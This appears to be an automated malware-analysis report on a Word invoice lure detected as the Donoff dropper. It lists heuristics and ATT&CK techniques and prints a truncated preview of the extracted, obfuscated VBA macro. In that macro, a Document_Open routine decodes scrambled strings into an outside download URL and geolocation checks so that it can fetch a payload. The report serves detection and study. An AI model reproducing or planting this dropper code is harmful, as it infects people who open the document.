MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains VBA macros, including a Document_Open macro that uses CreateObject and CallByName, indicative of malicious intent. The ClamAV detection 'Doc.Dropper.Donoff-5743527-0' further confirms its malicious nature. The document body presents a deceptive invoice, suggesting a phishing or scam attempt to elicit payment details. The VBA macro code, though partially obfuscated, likely facilitates the execution of a malicious payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19080 bytes |
SHA-256: 9f40415f1923ec7b2047da095aaf52a9a901e1c325eaebc6b25d3335c38426ef |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function PNWJBCwrE(ByVal BiYiwKWotLwR As Integer, ByVal fchSZ As Integer) As Boolean
wLFLjcaYOzEos 8548, 6208, "N6KGo9rdzoKX8CihQK3k7iY8EUiJD"
ICCdfkdM
PNWJBCwrE = False
End Function
Private Sub Document_Open()
Dim GZRfcMrT As String
Dim SYjdTW As Integer
ngcfTspyAkrFfa.zjMGJXftUO
End Sub
Private Function zIAZr(ByVal UgWeAFhlfZe As Integer) As String
unrlrdDmaZaSn = True
pUWozfTKYQev True, "1g04zCUmQ88WdlWR51XZXTLYDK", 2464
pwsEB 7533
GSqbJyKDDjmjk "TGloVEhPsVMWow08rJqNeAQXL"
xgTsQuybTg
dybqrGv
zIAZr = "x7Dp2zhxVdAjFwPxx"
End Function
Private Sub NGZFXMfYfMd(ByVal MngIdBnZt As Integer, ByVal wHkxxLNSV As Integer)
UkmZNoBp = True
RzymXXDIEq
wCsOtQyHhpGZJ
svKRngtUAI
End Sub
Attribute VB_Name = "ngcfTspyAkrFfa"
Private Function WQesRud() As String
WQesRud = JSwDt.XsUnlCKNXjhxcS("R0e0tstp0o8n se Bo8idgy", "8tg iU0")
End Function
Public Function avQabvXBC(ByVal byxfLUBUwe As Boolean, ByVal gRMRTnRpiCO As String, ByVal vkrwbf As String) As Object
Set avQabvXBC = JhjOfIkCHHzqQL("k0HS71N0ckSm07AHG39iP", CreateObject(vkrwbf))
End Function
Private Function JhjOfIkCHHzqQL(ByVal GXlBLHoSdZde As String, ByVal VLmWzvPBeAT As Object) As Object
azcsLy = "VVo3dLP1JdYEJKlYwIZQFlqxtyG"
Set JhjOfIkCHHzqQL = VLmWzvPBeAT
End Function
Private Sub murvMkHZhky()
IaigNJ = 6716
FMRCTruVnn
uDBHdJOTHqW 3091, 8067, 9917
End Sub
Private Sub TTwkEgzQC(ByVal MLClgg As String, ByVal JcNvnvI As String)
Dim cHBkYjIlvvkUTT As Integer
Dim CwrLG As String
Set iZGwmUBgS = DALPJSOds.LQAUYHMLbes(JcNvnvI, "2LDud2I6mD3zMcbyMwZHA4dgpvcWV", 8925)
DALPJSOds.rCeKxWHopVwVKQ JSwDt.XsUnlCKNXjhxcS("C:SaWnW'tI: dhoVTwn:lXohaWRd TbWhinIhaVryhS IfSil::e", "TXWhRI:VS"), iZGwmUBgS
HSrgevVvRWhDPh.RdPchyWLPrZLSx MLClgg, coPMakShCM.gDzhbFfIitrLG(iZGwmUBgS, "CCkLpwbqWUVdzP6ifoRvfrvuO7", WQesRud)
End Sub
Private Sub mVPFbYRecD()
TTwkEgzQC HSrgevVvRWhDPh.uDrJGhTuAw, JSwDt.XsUnlCKNXjhxcS("Dhtx8t8pR:/J/D8iJmxbakg8s8cka8nRDtakx.ckDoxmR/i8JmRagx8eJ/kl8okgok.Dbxkinx", "8kJRDx")
tiFzctERDq = "zi85IJzWAbiAFunn8R1EwhIRe"
HSrgevVvRWhDPh.qqKfXHEDuFbn HSrgevVvRWhDPh.uDrJGhTuAw
End Sub
Public Sub zjMGJXftUO()
Dim QSzWxH As Integer
Dim dzJrpHWpMQJvNk As Integer
On Error GoTo FGgodCgLjJCsUp
JSwDt.fQvBTJoJHymWgW
JSwDt.MlRZrJaO
mVPFbYRecD
Exit Sub
FGgodCgLjJCsUp:
End Sub
Private Function UzMdZwe(ByVal YYaXBF As String) As Integer
AjJdHZIlPBQJla "rgwD7xqT8epyUyeZv7RA4mu6K4yO", 2490
UzMdZwe = 1603
End Function
Attribute VB_Name = "JSwDt"
Private Function KhxjMEGnfDXEMZ() As String
KCHhdXN = 339
Set iZGwmUBgS = DALPJSOds.LQAUYHMLbes(JSwDt.XsUnlCKNXjhxcS("3hbtut3psl:T/IB/bwlww9b.mbTaTxmb3iBnVd.lc3oJmV/MgVueo3iI9pJ/JvV2.WJ19/cBVibt3y/lm9eI", "u3lI9BTbJMVW"), "Ytv1RfmldPiO3VKweHX4QFNb", 8925)
coPMakShCM.UENYxxYDlowuQO iZGwmUBgS, "koePH4JJMD1k2UvZq2", nBhZXXJbJfgrr, JSwDt.XsUnlCKNXjhxcS("ROJeOfOerOOe:r", ":MJ1Owj"), False, JSwDt.XsUnlCKNXjhxcS("Dhgt6tpQEsB:/Y/6wN6wwQ.6YmaBYxAmiAnEd6.F2co2mD/QeNnE/QlQoqcQYaNtYeD-mFyQq-qipA-ADad6dFQreBsgsq", "6qYBNE2FDQgA")
DALPJSOds.rCeKxWHopVwVKQ BgNMHVyVbPwk, iZGwmUBgS
KhxjMEGnfDXEMZ = coPMakShCM.gDzhbFfIitrLG(iZGwmUBgS, "81hfaiecd3PhFy98lpuj8061AUh8Q6sAt", JSwDt.XsUnlCKNXjhxcS("iRLeLspNoLNnsMieTNNexM6t", "M6LN2iH "))
End Function
Private Function SRymzZwFBMEA() As String
SRymzZwFBMEA = JSwDt.XsUnlCKNXjhxcS("R3ZeZceZ5nHtgFi6l6e35s", "Hg6 5ZC3U")
End Function
Public Sub MlRZrJaO()
Dim hPhoEqK As String
Dim smBfuWUObGJbm As Boolean
gFICAMxioTZUm = "710OMyUcatDRO3jWr6AyRWaYNNu"
hPhoEqK = KhxjMEGnfDXEMZ
For Each bHfSZgClB In SabpSdOvH
If MwoDglu.iUJgDSbNb("33A9kF9oYIOuKVImqMOW1d", hPhoEqK, bHfSZgClB) Then
Error 5
MyVFWz = 1566
End If
eyGiBkrwq = 483
Next
End Sub
Private Function MNmRMaFUFHzd() As String
MNmRMaFUFHzd = JSwDt.XsUnlCKNXjhxcS("qESnUETFn, FsMqpFolq", "F1inx7fMqU")
End Function
Pri
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.